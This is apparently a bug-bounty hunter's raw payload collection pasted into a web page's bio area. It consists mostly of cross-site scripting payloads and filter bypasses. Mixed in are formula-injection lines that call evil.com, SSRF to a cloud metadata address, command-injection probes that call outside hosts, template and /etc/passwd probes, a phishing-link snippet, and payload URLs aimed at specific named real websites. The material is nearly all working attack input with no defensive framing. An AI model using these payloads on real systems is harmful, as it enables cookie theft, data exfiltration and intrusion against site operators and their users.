'"/><img/src=` onerror=alert('name')> mail'"/><img/src=` onerror=alert('name')> '"/><img/src=` onerror=alert('name')> mail'"/><img/src=` onerror=alert('name')>

imgsrc-onerroralertname
<div class="mb-20 bio-area"> "&gt;&lt;/img&gt;&lt;img src=x onerror=confirm(/Xss-By-Arafat/)&gt;/ &lt;/textarea&gt;&lt;ScRiPt&gt;prompt(/920065/)&lt;/ScRiPt// "&gt;&lt;iframe/onload=alert(document.domain)// "&gt;&lt;iframe/src=javascript%26colon;[document.domain].find(alert)&gt; &lt;vipin oncopy =prompt(document.domain)&gt; " ="" '&gt;&lt;svg onload=setInterval`prompt\x28document.domain\x29` {{constructor.constructor('alert(1)')()}} &lt;?='&lt;SCRIPT&gt;alert("XSS")&lt;/SCRIPT&gt;'?&gt; &amp;lt;--`&lt;/a&gt;&lt;/script&gt;&lt;/svg&gt;&lt;img src="`" onerror="alert(1)"&gt; --!&amp;gt; https://bitsrc.io/ &lt;svg&gt;&lt;/p&gt;&lt;style&gt;&lt;a id="&lt;/style&gt;&lt;img src=1 onerror=alert(1)&gt;"&gt; &lt;a href=javas&amp;#99;ript:alert(1)&gt; &lt;details open ontoggle=alert(00)&gt; qwe&lt;details open ontoggle=alert.apply(self,[document.domain])&gt;qwe '"\&gt;&lt;img/src='1'onerror=alert(777)&gt;{{7*7}} javascript:x=’http://x.c’;alert(‘xss’);// ”/&gt;&amp;_lt;_script&gt;alert(1)&amp;_lt;/scr_ipt&amp;gt”/&gt; &lt;a href=javas&amp;#99;ript:alert(1)&gt;javascript:x= &lt;/script&gt;&lt;svg/onload=confirm(/yeasir/)&gt; "&gt;&lt;/script&gt;&lt;svg/onload=confirm(/yeasir/)&gt; &lt;/ScRiPt//"&gt;&lt;iframe/onload=alert(document.domain)// https://github.com/streaak/keyhacks &lt;a"/onclick=(confirm)(1)&gt;&lt;click here! 
test&lt;img src=x onerror=alert(document.domain) x=y &lt;div&gt;&lt;/svg.onload”=”confirm(domain)””/&gt;&lt;/div&gt; &lt;img src=x onerror=prompt(String.fromCharCode(47,88,83,83,80,79,83,69,68,47)) /&gt;&lt;!-- "&gt;&lt;img src=x Onerror="top[8680439..toString(30)](document.cookie)"&gt; "&gt;&lt;noscript&gt;&lt;p title="&lt;/noscript&gt;&lt;img src=x onerror=alert(1)&gt;"&gt; "&gt;&lt;object/onerror=prompt`1`// (A("onerror='alert`1`'testacd))/ " onfocus=alert;throw `1` autofocus&gt; %27-((alert))(document.cookie)-%27 test';alert(document.domain);' test";prompt`document.domain`; var x="1 );}};prompt(document.domain);function require(test){};function lol(){switch (1){case 1:console.log(1 ;&lt;svg/onload=x&gt;"&gt;&lt;/script&gt;&lt;svg/onload=(confirm)(document.domain)&gt; xss"&gt;&lt;!--&gt;&lt;svg/onload=alert(1)&gt; "/&gt;&lt;script&gt;confirm(1);&lt;/script&gt; &lt;svg/onload=eval(atob(‘YWxlcnQoZG9jdW1lbnQuY29va2llKQ==’))&gt; Bottom Exotic Payloads test'"&lt;svg%0aonload=((alert))(document.cookie)// https://18.222.108.105:80/ssrf.html " ="" '&gt;&lt;svg onload='this["src"]="jav"+"as&amp;Tab;cr"+"ipt:al"+"er"+"t()"';&gt; https://www.photoaffections.com/custom-blankets/personal-creation-p-62000?option_id=886&amp;qty=1&amp;paper=%27-alert(%22xss%20fired%22)-%27 https://www.photoaffections.com/custom-mugs/create-your-own-p-58377?view=%27-alert(1)-%27&amp;qty=1 https://www.photoaffections.com/canvas-prints/create_item.php?item_id=45322013&amp;custom_service_id=&amp;customer_comments="&gt;&lt;iframe/onload=alert(document.cookie)//&amp;proof_requested=1&amp;isAjax=true&amp;stepedge=1 https://www.pollardwater.com/misc/ajax/getContractAndStoreOfAccount.jsp?selectedAccountId=610&amp;selectedBranchId=POLLARDWTR%27 Php 7.1.x ?a=ls %3Cimg src='null' onerror=alert('Xss')%3E %3Cimg src onerror=%26emsp;prompt`${document.domain}`%3E &lt;svg/OnLoad="`${prompt``}`"&gt; ZI4XPJYV4 SRT_z1np0f2a14 Bcpsc22@ TE.CL Note To send this request using Burp Repeater, you must first go to the 
Repeater menu and make sure that the “Update Content-Length” option is unchecked. You need to include the ending sequence \ r \ n \ r \ n after the last 0. ]]] https://memn0ps.github.io/2019/09/13/HTTP-Request-Smuggling-CL-TE.html &lt;svg/onload=x&gt;"&gt;&lt;/script&gt;&lt;svg/onload=confirm(/123/)&gt; "onmouseover=prompt(document.domain);// 'onmouseover=prompt(document.domain);// &lt;x onauxclick=a=alert,a(domain)&gt;click &lt;script&gt;for((i)in(self))eval(i)(1)&lt;/script&gt; &lt;scr&lt;script&gt;ipt&gt;alert(1)&lt;/scr&lt;/script&gt;ipt&gt;&lt;scr&lt;script&gt;ipt&gt;alert(1)&lt;/scr&lt;/script&gt;ipt&gt; &lt;sCR&lt;script&gt;iPt&gt;alert(1)&lt;/SCr&lt;/script&gt;IPt&gt; &lt;video src=1 onerror=alert(1)&gt; &lt;audio src=1 onerror=alert(1)&gt; “&lt;script src=//xsshere?”@email.com “1-’or’1'=’1”@email.com WAF BYPASS PAYLOAD+ &lt;a%20onclick="document.write(document.cookie);"&gt;/ %3c&lt;aa+ONLOAD+href=javasONLOADcript:promptONLOAD(1)%3e &lt;object/data="javascript&amp;colon;alert/**/(document.domain)"&gt;// "&gt;&lt;/a&gt;&lt;object/data="javascript&amp;colon;alert/**/(document.domain)"&gt;// %22%3E%3Cd3v%2Fonauxclick%3D%5B2%5D.some%28confirm%29%3Eclick constant&lt;object data='data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=='&gt;&lt;/object&gt; &lt;iframe srcdoc=&lt;svg/o&amp;#x6Eload&amp;equals;alert&amp;lpar;1)&amp;gt;&gt; &lt;iframe/onload='this["src"]="jav"+"as&amp;Tab;cr"+"ipt:al"+"er"+"t()"';&gt; &lt;svg&lt;0x0c&gt;onload=alert(1)&gt;&lt;svg&gt; '&gt;&lt;details/open/ontoggle=confirm(document.location)&gt; &lt;style/&gt;&lt;img src="z'z&lt;/style&gt;&lt;script/z&gt;alert(1)&lt;/script&gt;"&gt; &lt;&lt;/div&gt;script&lt;/div&gt;&gt;alert()&lt;&lt;/div&gt;/script&lt;/div&gt;&gt; &lt;svg&gt;&lt;b&gt;&lt;style&gt;&lt;img id="&amp;lt;/style&amp;gt;&amp;lt;img src=1 onerror=alert(1)&amp;gt;"&gt; &lt;svg%0Aonauxclick=0;[1].some(confirm)// &lt;svg onload\r\n=$.globalEval("al"+"ert()");&gt; &lt;svg/onload=self[`aler`%2b`t`]`1`&gt; 
“&gt;&lt;svg/on&lt;/script&gt;load=alert`1`&gt; "--!&gt;&lt;svg/onload=prompt(/1234/)&gt;" "xss"&gt;&lt;!--&gt;&lt;svg/onload=alert(document.domain)&gt;" &lt;svg id=javascript:alert(10) onload=location=id&gt; 1'"()&amp;%&lt;%20&gt;&lt;ScRiPt &gt;prompt(1)&lt;/ScRiPt&gt; '-`aler`%2B`t`]`1`-' alert\\`1\\` &amp;&lt;script&amp;S1&amp;TS&amp;1&gt;alert&amp;A7&amp;(1)&amp;R&amp;UA;&amp;&amp;&lt;&amp;A9&amp;11/script&amp;X&amp;&gt; &gt;&lt;embed src=//14.rs&gt; &lt;script src=//14.rs&gt;&lt;/script&gt; &lt;script src="(https)://14.rs"&gt;&lt;/script&gt; "&gt;&lt;script src=https://xssbyyeasir.xss.ht&gt;&lt;/script&gt; "&gt;&lt;img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8veHNzYnl5ZWFzaXIueHNzLmh0Ijtkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKGEpOw&amp;#61;&amp;#61; onerror=eval(atob(this.id))&gt; &lt;iframe+src%3d"http%3a//169.254.169.254/latest/user-data"&gt;xss&lt;/iframe&gt; X-Forwarded-For:- &lt;a href=”attacker.com”&gt;&lt;h1&gt;&lt;font color=”red”&gt;Please click here to login to your account&lt;h1&gt;&lt;/font&gt;&lt;/a&gt; 6.31y7hu %2526%2Bnslookup%2Bcxx8nlugxbqajjeguq7iwpzsdbxnyfj5o-a6ssjqlda.r87.me%2526%2527%255c%2522%25600%2526nslookup%2Bcxx8nlugxbqajjeguq7iwpzsdbxnyfj5o-a6ssjqlda.r87.me%2526%2560%2527 "&gt;&lt;img src=x onerror="document.body.innerHTML='modified';alert(document.cookie);"&gt; &lt;form&gt;&lt;button formaction="javascript:alert(123)"&gt;xss&lt;noscript&gt;&lt;/noscript&gt;&lt;/button&gt;&lt;/form&gt; "&gt;&lt;d3v/onauxclick=[2].some(confirm)&gt;click &lt;&lt;scrip&lt;scriptT&gt;alert(1); 4320909150006705 05/2022 300 Number: 4111111111111111 Date: 03/30 CVV: 737 '"()&lt;tbm&gt;&lt;ScRiPt &gt;prompt(/XSSPOSED/)&lt;/ScRiPt&gt; &lt;a href="&amp;#x3000;javascript:alert(1)"&gt;CLICKME&lt;/a&gt; { 1 }; &lt;img src=x:alert(alt) onerror=eval(src) alt='spyerror'&gt; { 2 }; "&gt;&lt;/tag&gt;&lt;svg onload=alert(spyerror)&gt; - x" onerror="alert(document.domain) xss\"\u003E\u003Ch1 
onmous\u0045leave=co\u006efirm(domain)\u003ECome to Me\u003C/h1\u003E\u003Cbr\u003E\u003C!-- --&gt;&lt;/title&gt;&lt;/script&gt;&lt;/iframe&gt;&lt;/style&gt;&lt;/textarea&gt;&lt;/span&gt;&lt;svg/onload=alert(String.fromCharCode(49))&gt; "&gt;&lt;object/onerror=prompt`1`//e&amp;discount;=0JAVASCript:/*-/*`/*\`/*%27/*"/**/(/*%20*/oNcliCk=alert()%20)//%0D%0A%0D%0A//&lt;/stYle/&lt;/titLe/&lt;/teXtarEa/&lt;/scRipt/--!&gt;\x3csVg/&lt;sVg/oNloAd=prompt(%27openbugbounty%27)//&gt;\x3e "%27--!&gt;&lt;/Title/&lt;/Style/&lt;/Script/&lt;/Textarea/&lt;/Noscript/&lt;/Pre/&lt;/Xmp&gt;&lt;Script%20/K&gt;(confirm)(%27OpenBugBounty%27)&lt;/Script/&gt; &lt;script&gt;alert(1)&lt;/script&gt;’”;}) alert(1);&gt;&lt;link/onload=alert(1)&gt; "'--&lt;input type=text autofocus onfocus=(prompt)(document.domain) &lt;!--//'&gt;&lt;/input&gt; &lt;IMG SRC='vbscript:msgbox(\"XSS\")'&gt; &amp;#x3C;img src=x onerror=alert(document.domain)&amp;#x3E;TEST &lt;img src='1' onerror='alert(0)' &lt;y "&gt;&lt;svg/onload=alert(/2/);&gt; &lt;script&gt;alert(atob("SGVyZSBpcyB0aGUgWFNT"))&lt;/script&gt; &lt;script type="module"&gt;import'data:text/javascript;base64,YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ'&lt;/script&gt; "&gt;&lt;frameset/onpageshow=alert(/X/)&gt; &lt;input onfocus=prompt(document.domain) autofocus&gt;"--&gt; "/**/autofocus/**/onfocus="alert('XSSPOSED');" "&gt;&lt;/sCrIPt&gt;&lt;sCRIPt&gt;confirm(/XSs;/)&lt;/ScRiPt&gt; ;print(md5(xss)); set|set&amp;set &lt;/input&gt;&lt;input type=``text``//;valaue=`` autofocus onfocus=alert(1) a=``&gt; &lt;img src=1 alt=al lang=ert onerror=top[alt+lang](0)&gt; &lt;script&gt;$=1,alert($)&lt;/script&gt; &lt;script ~~~&gt;confirm(1)&lt;/script ~~~&gt; &lt;script&gt;$=1,\u0061lert($)&lt;/script&gt; &lt;&lt;/script/script&gt;&lt;script&gt;eval('\\u'+'0061'+'lert(1)')//&lt;/script&gt; &lt;&lt;/script/script&gt;&lt;script ~~~&gt;\u0061lert(1)&lt;/script ~~~&gt; &lt;/style&gt;&lt;/scRipt&gt;&lt;scRipt&gt;alert(1)&lt;/scRipt&gt; 
&lt;img/id="alert&amp;lpar;&amp;#x27;XSS&amp;#x27;&amp;#x29;\"/alt=\"/\"src=\"/\"onerror=eval(id&amp;#x29;&gt; &lt;img src=x:prompt(eval(alt)) onerror=eval(src) alt=String.fromCharCode(88,83,83)&gt; &lt;svg&gt;&lt;x&gt;&lt;script&gt;alert&amp;#40;&amp;#39;1&amp;#39;&amp;#41&lt;/x&gt; &lt;iframe src=""/srcdoc='&amp;lt;svg onload&amp;equals;alert&amp;lpar;1&amp;rpar;&amp;gt;'&gt; {{7*7}}&lt;!--#exec cmd="cat /etc/passwd" --&gt;"&gt;&lt;iframe/onload=alert(document.domain)// &lt;sVg/oNloAd=//&gt;&lt;sVg/oNloAd=alert("XSS2")//&gt;@gmail.com &lt;!%27/*!"/*!\%27/*\"/*--!&gt;&lt;Input/Autofocus/%0D*/Onfocus=confirm`OPENBUGBOUNTY`//&gt;&lt;Svg&gt; --&gt;&lt;/script&gt;&lt;script&gt;alert(document.domain);// \”}})})-confirm`1`;(function(){({if(){/*/// \”}})})-confirm`1`(a=&gt;{({b:{/*/// \”-confirm`1`// “-prompt`1`-”// \u0027-confirm`1`-\u0027 ';alert(/OPENBUGBOUNTY/)// '-onfocus=alert(document.domain)-' javascript:alert(1);// javascript:alert(document.domain) "onmouseover="prompt(document.domain) h/&lt;\i&lt;script&gt;alert("i");&lt;/script&gt; "&gt;&lt;marquee&gt;&lt;IMG src=x onmouseover=prompt(document.domain);&gt;&lt;/marquee&gt; https://www.playstation.com/en-us/search/?q=" /&gt;&lt;script&gt;alert(1);// '-confirm(document.domain)-' "&gt;&lt;img/src='1'onerror=alert(1)&gt; "&gt;&lt;svg/onload=alert(domain)&gt; "&gt;&lt;script&gt;alert('xss')&lt;/script&gt; "&gt;&lt;img src=x onerror=alert(domain)&gt;@ymail.com "&gt;&lt;img src=x onerror=prompt(document.domain)&gt;" "&gt; &lt;img src="x" onerror="prompt(domain)"&gt;&lt;/img&gt; Hackthegif #"&gt;&lt;img src=c onerror=alert(1)&gt;/ #//&gt;&lt;img src=x&gt;&lt;svg/onload=confirm("Xss-By-Arafat")&gt;/ &lt;/script&gt;&lt;video src=x onerror=alert(document.domain)&gt; "&gt;&lt;/sCrIPt&gt;&lt;sCRIPt&gt;confirm(/XSs;/)&lt;/ScRiPt&gt; javascript://google.com/?%0aalert(document.domain) &amp;lt;img src=x onerror=prompt(999)&amp;gt; &amp;#34;&amp;#62;&amp;#60;img/src=1 onerror=alert(1)&amp;#62; 
%22%3E%3Cimg%20src%3Dx%20onerror%3Dprompt%280%29%3E aaa"&gt;fffff&lt;/script&gt;&lt;script&gt;alert(document.domain)&lt;/script&gt;aaaaa "&gt;&lt;/title&gt;&lt;img src=1 onerror=prompt(document.domain)&gt; %27%22%3E%3Cscript%3Ealert%28%27XSS%20@%20%27%2bdocument.domain%29%3C%2fscript%3E data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+ 0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgndGVzdDMnKTwvc2NyaXB0Pg" HTTP-EQUIV="refresh" a="a &gt;&gt; meta tag 0;data:text/html;base64,PHNjcmlwdD5wcm9tcHQoIlJlZmxlY3RlZCBYU1MgQnkgUHJpYWwiKTwvc2NyaXB0Pg=="HTTP-EQUIV="refresh" 0;data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+"HTTP-EQUIV="refresh" 0;http://evil.com"HTTP-EQUIV="refresh" &lt;input type="text" value="" onmouseover="alert('XSS')"&gt; url=google.com:/onclick='alert(document.domain)'[url=]]xss[/url] ![xss" onload=alert(1);//](a) ![Uh oh...]("onerror="alert('XSS')) javascripT://https://google.com%0aalert(1);//https://google.com javascript://deals.razerzone.com/%E2%80%A8alert(1)//https://deals.razerzone.com %03javascript://deals.razerzone.com/%E2%80%A8alert(1)//https://deals.razerzone.coms %00javascript://yeasir.com/%E2%80%A8alert(document.domain)//https://yeasir.com https://airvpn.org/external_link/?url=%03javascript://deals.razerzone.com/%E2%80%A8alert(document.domain)//https://deals.razerzone.comsdfs%0Aj%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At%0A%3Aalert(0) &lt;?xml version="1.0"?&gt;&lt;x:script xmlns:x="http://www.w3.org/1999/xhtml"&gt;alert(document.domain&amp;#x29;&lt;/x:script&gt; “&gt;&lt;?xml version=”1.0" standalone=”no”?&gt;&lt;!DOCTYPE svg PUBLIC “-//W3C//DTD SVG 1.1//EN” “http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"&gt;&lt;svg version=”1.1" baseProfile=”full” xmlns=”http://www.w3.org/2000/svg"&gt;&lt;polygon id=”triangle” points=”0,0 0,50 50,0" fill=”#009900" stroke=”#004400"/&gt;&lt;script type=”text/javascript”&gt;alert(document.location);&lt;/script&gt;&lt;/svg&gt; This is an outdated page. 
You will now be redirected to our new page"); window.location="https://google.com"// JaVaScRiPT%0a:alert(document.cookie);///// java%0d%0ascript%0d%0a:alert(0) javascript:new%20Function`al\ert\`2222\``; javascript://www.whitelisteddomain.tld?%a0alert%281%29 &lt;form&gt;&lt;button formaction="javascript:alert(123)"&gt;xss {php}$s = file_get_contents('/etc/passwd',NULL, NULL, 0, 100); var_dump($s);{/php} =HYPERLINK(“http://evil.com?x=”&amp;A3&amp;”,”&amp;B3&amp;”[CR]”,”Error fetching info: Click me to resolve.”) =cmd|'/C calc'!A0 =cmd|' /C calc'!A0 =cmd|’ /C notepad’!’A1′ ;=2+5+cmd|' /C calc'!A0 =2+2 {7*7} %{2+2} %{%{2+2}} {{7*7}}&lt;!--#exec cmd="cat /etc/passwd" --&gt; &amp;#x3C;img/­src=&amp;#x60;%00&amp;#x60; onerror=this.onerror­=alert(document.cook­i) &lt;svg/on&lt;script&gt;load=prompt(document.domain);&gt;”/&gt;&lt;svg/on&lt;script&gt;load=prompt(document.cookie);&gt; &lt;a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="&gt;poc&lt;/a&gt; &lt;b"/onauxclick='-alert(1);'&gt;XXS The payload will run in all the context. 
Eg - &lt;input type="text" value="&lt;b"/onauxclick='-alert(1);'&gt;XXS"&gt; &lt;b"/onauxclick='-alert(2);'&gt;XXS yeasir"&gt;&lt;h1&gt;&lt;a/href="javascript&amp;colon;alert&amp;lpar;document&amp;period;domain&amp;rpar;"&gt;click_me&lt;/a&gt;arafat_is_html_injection.....&lt;style&gt;h1{background-color:red;color:yellow;} &lt;script&gt; var test='&lt;b"/onauxclick='-alert(3);'&gt;TEST'; &lt;/script&gt; &lt;noscript&gt;&lt;p title="&lt;/noscript&gt;&lt;img src=x onerror=alert(1)&gt;"&gt; &lt;noscript&gt;&lt;p title="&lt;/noscript&gt;&lt;svg/onload=alert(45)&gt;"&gt; &lt;noframes&gt;&lt;p title="&lt;/noframes&gt;&lt;svg/onload=alert(45)&gt;"&gt; &lt;iframe&gt;&lt;p title="&lt;/iframe&gt;&lt;svg/onload=alert(45)&gt;"&gt; &lt;xmp&gt;&lt;p title="&lt;/xmp&gt;&lt;svg/onload=alert(45)&gt;"&gt; [11:48 AM, 4/12/2019] Yeasir Arafat: " onload="javascript:alert('XSS Example') [11:49 AM, 4/12/2019] Yeasir Arafat: " onload="alert(String.fromCharCode(88,83,83)) https://google.com\'onmouseover='prompt(1)' &lt;div id="document.domain"&gt;&lt;svg&gt;&lt;style&gt;&amp;lt;img/src=x onerror=prompt(document.domain)// &lt;/br&gt;//["`--&gt;]]&gt;]&lt;/div&gt; &lt;a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="&gt;poc&lt;/a&gt; &lt;img ismap='xxx' itemtype='yyy style=width:100%;height:100%;position:fixed;left:\ 0px;top:0px; onmouseover=alert(/XSS/)//'&gt; "&gt;&lt;/script&gt;&lt;svg onload=%26%2397%3B%26%23108%3B%26%23101%3B%26%23114%3B%26%23116%3B(document.domain)&gt; &lt;iframe src=%22404%22 onload=%22top.frames[0].document.(%26quot;&lt;script&gt;r=new XMLHttpRequest();r.open('POST','https://www.facebook.com',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}&lt;\/script&gt;%26quot;)%22&gt;&lt;/iframe&gt; &lt;sCrIpt&gt;alert(1)&lt;/ScRipt&gt; &lt;script x&gt; &lt;script x&gt;alert('XSS')&lt;script y&gt; &lt;img src='1' onerror='alert(0)' &lt; String.fromCharCode(88,83,83) 
http://localhost/bla.php?test=&lt;/script&gt;&lt;script&gt;alert(1)&lt;/script&gt; &lt;html&gt; &lt;script&gt; &lt;?php echo 'foo="text '.$_GET['test'].'";';`?&gt; &lt;/script&gt; &lt;/html&gt; Bypass quotes in mousedown event &lt;a href="" onmousedown="var name = '&amp;#39;;alert(1)//'; alert('smthg')"&gt;Link&lt;/a&gt; &lt;script&gt;window['alert'](document['domain'])&lt;script&gt; alert`1` Bypass onxxxx= blacklist &lt;object onafterscriptexecute=confirm(0)&gt; &lt;object onbeforescriptexecute=confirm(0)&gt; &lt;img src='1' onerror\x00=alert(0) /&gt; &lt;img src='1' onerror\x0b=alert(0) /&gt; &lt;img src='1' onerror/=alert(0) /&gt; &lt;img/src='1'/onerror=alert(0)&gt; &lt;div id = "x"&gt;&lt;/div&gt;&lt;script&gt;alert(x.parentNode.parentNode.parentNode.location)&lt;/script&gt; &lt;script&gt; foo="text &lt;/script&gt;&lt;script&gt;alert(1)&lt;/script&gt;"; &lt;/script&gt; #JS/URL polyglot" data:text/html;alert(1)/*,&lt;svg%20onload=eval(unescape(location))&gt;&lt;title&gt;*/;alert(2);function%20text(){};function%20html(){} #WASM https://vulnerabledoma.in/polyglot/wasmjscsshtml.html #BlindXSS '"&gt;*/--&gt;&lt;/title&gt;&lt;/style&gt;&lt;/textarea&gt;&lt;/script%0A&gt;&lt;img src=x onerror=confirm(1)&gt; #xss " onclick=alert(1)//&lt;button ‘ onclick=alert(1)//&gt; */ alert(1)// #xss2 ';alert(String.fromCharCode(88,83,83))//';alert(String. 
fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- &gt;&lt;/SCRIPT&gt;"&gt;'&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83)) &lt;/SCRIPT&gt; #xss3 "&gt;&gt;&lt;marquee&gt;&lt;img src=x onerror=confirm(1)&gt;&lt;/marquee&gt;" &gt;&lt;/plaintext\&gt;&lt;/|\&gt;&lt;plaintext/onmouseover=prompt(1) &gt;&lt;script&gt;prompt(1)&lt;/script&gt;@gmail.com&lt;isindex formaction=javascript:alert(/XSS/) type=submit&gt;'--&gt;" &gt;&lt;/script&gt;&lt;script&gt;alert(1)&lt;/script&gt;"&gt;&lt;img/id="confirm&amp;lpar; 1)"/alt="/"src="/"onerror=eval(id&amp;%23x29;&gt;'"&gt;&lt;img src="http: //i.imgur.com/P8mL8.jpg"&gt;  #sqli SLEEP(1) /*‘ or SLEEP(1) or ‘“ or SLEEP(1) or “*/ https://medium.com/@arbazhussain/stored-xss-on-rockstar-game-c008ec18d071 Rules &gt; http://h1.nobbd.de/ http://bugbountyworld.com/ https://medium.com/@phwd https://whitton.io/ https://medium.com/@arbazhussain/10-rules-of-bug-bounty-65082473ab8c Facebook&gt;&gt; https://web.facebook.com/notes/phwd/facebook-bug-bounties-the-unofficial-treasure-map/1020506894706001?_rdc=1&amp;_rdr https://medium.com/@rajsek/my-3rd-facebook-bounty-hat-trick-chennai-tcs-er-name-listed-in-facebook-hall-of-fame-47f57f2a4f71 PostMessage-XSS: &lt;body onload="hack()"&gt;&lt;script&gt; function hack(){ window.parent.postMessage( {"location":null, "text":null, "html": null, "base64": null}, "*"); }&lt;/script&gt;&lt;/body&gt; https://challenge.intigriti.io/#data:text/html;alert(document.domain);base64,PGJvZHkgb25sb2FkPSJoYWNrKCkiPjxzY3JpcHQ+IGZ1bmN0aW9uIGhhY2soKXsgd2luZG93LnBhcmVudC5wb3N0TWVzc2FnZSggeyJsb2NhdGlvbiI6bnVsbCwgInRleHQiOm51bGwsICJodG1sIjogbnVsbCwgImJhc2U2NCI6IG51bGx9LCAiKiIpOyB9PC9zY3JpcHQ+PC9ib2R5Pg https://challenge.intigriti.io/?#data:text/html;lol=alert(document.domain)//;base64,PHNjcmlwdD5zZXRUaW1lb3V0KGZ1bmN0aW9uKCl7cGFyZW50LnBvc3RNZXNzYWdlKHsidGV4dCI6IDEsICJodG1sIjogMiwgImJhc2U2NCI6IDN9LCAiKiIpO30sIDE1MDApPC9zY3JpcHQ+ICAg &amp; 
&lt;/script&gt;&lt;script&gt;alert(document.domain)&lt;/script&gt; "'--!&gt;&lt;/Iframe&gt;&lt;Iframe /SrcDoc=%26lt;Svg/O%26%23x6Eload%26equals;confirm%26lpar;1%26rpar;%26gt;&gt;# eeee&lt;%2fscript&gt;&lt;script&gt;prompt(/XSS/.source)&lt;%2fscript&gt;yyyy &lt;!'/*"/*\'/*\"/*--&gt;&lt;/Script&gt;&lt;Image SrcSet=K */; OnError=confirm`1` //&gt;# %3C!%27/*%22/*\%27/*\%22/*--%3E%3C/Script/%3E%3CScript%3Econfirm(document.domain)%3C/Script/%3E# &lt;--`&lt;img/src=` onerror=alert(1)&gt; --!&gt; &lt;script/src=&amp;#100&amp;#97&amp;#116&amp;#97:text/&amp;#x6a&amp;#x61&amp;#x76&amp;#x61&amp;#x73&amp;#x63&amp;#x72&amp;#x69&amp;#x000070&amp;#x074,&amp;#x0061;&amp;#x06c;&amp;#x0065;&amp;#x00000072;&amp;#x00074;(1)&gt;&lt;/script&gt; &lt;div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)"&gt;x&lt;/button&gt; &lt;form&gt;&lt;button formaction=javascript&amp;colon;alert(1)&gt;CLICKME &lt;SCRIPT&gt;alert();&lt;/SCRIPT&gt;"&gt;&lt;&lt;SCRIPT&gt;alert();&lt;/SCRIPT&gt;img src=x onerror=alert(1);&gt;&lt;SCRIPT&gt;alert();&lt;/SCRIPT&gt; &lt;SCRIPT&gt;alert();&lt;/SCRIPT&gt;"&gt;&lt;&lt;SCRIPT&gt;&lt;/SCRIPT&gt;img src=x onerror=alert(1);&gt;&lt;SCRIPT&gt;alert();&lt;/SCRIPT&gt; &amp;lt;--`&lt;/a&gt;&lt;/script&gt;&lt;/svg&gt;&lt;img src="`" onerror="alert(1)"&gt; --!&amp;gt; &lt;/x&gt;&lt;/svg&gt;&lt;iframe src="" srcdoc="&amp;lt;svg onload=alert(15)&amp;gt;"&gt;{{7*7}} &lt;script src="data:text/javascript,alert(1)"&gt;&lt;/script&gt; &lt;a onmouseover="alert(document.cookie)"&gt;xxs link&lt;/a&gt; &lt;marquee onstart='javascript:alert&amp;#x28;1&amp;#x29;'&gt;^__^ #&lt;iframe src=javascript:alert(document.domain) /&gt; &gt;&lt;marquee onstart=alert(1233)&gt;test alert(document.getElementsByName(%22SAMLResponse%22)[0].defaultValue);// 
"&gt;&lt;h1&gt;&lt;a/href="javascript&amp;colon;alert&amp;lpar;document&amp;period;domain&amp;rpar;"&gt;click_me&lt;/a&gt;this_is_html_injection.....&lt;style&gt;h1{background-color:red;color:yellow;} "&gt;&lt;iframe/onload=aaaaajavascript&amp;colon;alert&amp;lpar;document&amp;period;domain&amp;rpar;&gt; &gt;&lt;/span&gt;&lt;p onmouseover='p=~[];p={___:++p,$$$$:(![]+"")[p],__$:++p,$_$_:(![]+"")[p],_$_:++p,$_$$:({}+"")[p],$$_$:(p[p]+"")[p],_$$:++p,$$$_:(!""+"")[p],$__:++p,$_$:++p,$$__:({}+"")[p],$$_:++p,$$$:++p,$___:++p,$__$:++p};p.$_=(p.$_=p+"")[p.$_$]+(p._$=p.$_[p.__$])+(p.$$=(p.$+"")[p.__$])+((!p)+"")[p._$$]+(p.__=p.$_[p.$$_])+(p.$=(!""+"")[p.__$])+(p._=(!""+"")[p._$_])+p.$_[p.$_$]+p.__+p._$+p.$;p.$$=p.$+(!""+"")[p._$$]+p.__+p._+p.$+p.$$;p.$=(p.___)[p.$_][p.$_];p.$(p.$(p.$$+"\""+p.$_$_+(![]+"")[p._$_]+p.$$$_+"\\"+p.__$+p.$$_+p._$_+p.__+"(\\\"\\"+p.__$+p.__$+p.___+p.$$$_+(![]+"")[p._$_]+(![]+"")[p._$_]+p._$+",\\"+p.$__+p.___+"\\"+p.__$+p.__$+p._$_+p.$_$_+"\\"+p.__$+p.$$_+p.$$_+p.$_$_+"\\"+p.__$+p._$_+p._$$+p.$$__+"\\"+p.__$+p.$$_+p._$_+"\\"+p.__$+p.$_$+p.__$+"\\"+p.__$+p.$$_+p.___+p.__+"\\\"\\"+p.$__+p.___+")"+"\"")())();'&gt; XSS&lt;svg/onload="eval(String.fromCharCode(97,108,101,114,116,40,100,111,99,117,109,101,110,116,46,100,111,109,97,105,110,41));"&gt; &lt;/title&gt;&lt;svg onload="&amp;#0000097&amp;#0000108&amp;#0000101&amp;#0000114&amp;#0000116&amp;#0000040&amp;#0000100&amp;#0000111&amp;#0000099&amp;#0000117&amp;#0000109&amp;#0000101&amp;#0000110&amp;#0000116&amp;#0000046&amp;#0000100&amp;#0000111&amp;#0000109&amp;#0000097&amp;#0000105&amp;#0000110&amp;#0000041"&gt; XSS&lt;img src='a'/onerror='eval(String.fromCharCode(97,108,101,114,116,40,100,111,99,117,109,101,110,116,46,100,111,109,97,105,110,41,59));'/&gt; &lt;var onmouseover="prompt(document.cookie)"&gt;x275&lt;/var&gt; 01721037692 https://vulnerabilities.in/blog/ https://medium.com/@ozguralp/simple-remote-code-execution-vulnerability-examples-for-beginners-985867878311 
